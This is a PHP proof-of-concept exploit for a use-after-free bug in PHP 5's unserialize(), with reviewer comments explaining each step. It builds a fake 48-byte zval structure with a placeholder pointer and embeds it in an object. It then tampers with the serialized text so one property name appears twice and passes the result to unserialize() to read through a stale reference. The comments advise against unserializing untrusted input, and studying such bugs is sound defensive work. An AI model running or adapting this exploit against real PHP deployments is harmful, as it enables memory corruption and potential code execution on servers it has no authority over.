<?php
// Integer that the script later encodes with ptr2str() into the first 8 bytes
// of the crafted string (the slot the original comments label "zvalue_value value").
// NOTE(review): 0xb788 looks like an arbitrary placeholder address chosen by the
// author, not a value derived at runtime; confirm before relying on it.
$base = 0xb788;
/**
 * Encode an integer as an 8-byte binary string, least-significant byte first.
 *
 * Each pass takes the low 8 bits of the remaining value, turns them into one
 * byte with chr(), and shifts the value right by 8 bits.
 *
 * @param int $ptr Value to encode.
 * @return string Exactly 8 bytes, low byte first.
 */
function ptr2str($ptr)
{
    $bytes = array();
    $rest = $ptr;
    $left = 8;
    while ($left-- > 0) {
        // Mask before chr() so only the current low byte is emitted.
        $bytes[] = chr($rest & 0xff);
        $rest = $rest >> 8;
    }
    return implode("", $bytes);
}
// Proof-of-concept input for an unserialize() memory-safety bug.
// The script hand-builds a 48-byte string whose layout, per the author's field
// comments, imitates the interpreter's internal value record (zval), then
// serializes an object, edits the serialized text so one property name occurs
// twice, and feeds the result back to unserialize().
// NOTE(review): the field names (refcount__gc, is_ref__gc) match the PHP 5
// zval struct on a 64-bit build; the affected versions are not stated here.
// Reviewer takeaway: unserialize() must never receive attacker-controlled
// bytes; use a data-only format such as JSON for untrusted input and keep the
// interpreter patched.

// Bytes 0-7: $base encoded low byte first.
$zval = ptr2str($base);// zvalue_value value; /* value */
// Bytes 8-15: the value 0xf. Presumably the length half of the string
// variant of the value union; verify against the target struct definition.
$zval .= ptr2str(0xf);
// Bytes 16-19: four zero bytes in the reference-count slot.
$zval .= "\x00\x00\x00\x00";// zend_uint refcount__gc;
//$zval .= ptr2str(0);
// Byte 20: type tag 0x06. NOTE(review): 6 is IS_STRING in PHP 5; confirm.
$zval .= "\x06";// zend_uchar type; /* active type */
//$zval .= ptr2str(0x6);
// Byte 21: is_ref flag cleared.
$zval .= "\x00";// zend_uchar is_ref__gc;
// Bytes 22-45: 24 zero bytes, then two filler 'A' bytes (48 bytes in total).
// NOTE(review): this looks like padding to reach a specific allocation size; confirm.
$zval .= ptr2str(0);
$zval .= ptr2str(0);
$zval .= ptr2str(0);
$zval .= 'AA';
// Object graph to serialize. $u is stored by reference inside the 'aaa' array
// and again as property 'ccc', so both entries refer to the same variable.
$m = new StdClass();
$u = 'AAAA';
$m->aaa = array(1,2,&$u,4,5);
$m->bbb = 1;
// The crafted 48-byte string is carried as an ordinary array element.
$m->ddd = array(1,2,$zval);
$m->ccc = &$u;
$z = serialize($m);
// Rename property 'bbb' to 'aaa' in the serialized text. Both names are three
// bytes long, so the length prefixes stay valid, and the stream now defines
// 'aaa' twice. str_replace() rewrites every "bbb" substring, not only the key.
// NOTE(review): the duplicate key presumably makes unserialize() discard the
// first 'aaa' array while the later 'ccc' reference still points into it (a
// use-after-free); confirm against the corresponding bug report.
$z = str_replace("bbb", "aaa", $z);
// Print the tampered payload for inspection.
var_dump($z);
// Trigger: decode the tampered stream, then dump the result. On an affected
// build the dump would read through the stale reference.
$y = unserialize($z);
var_dump($y);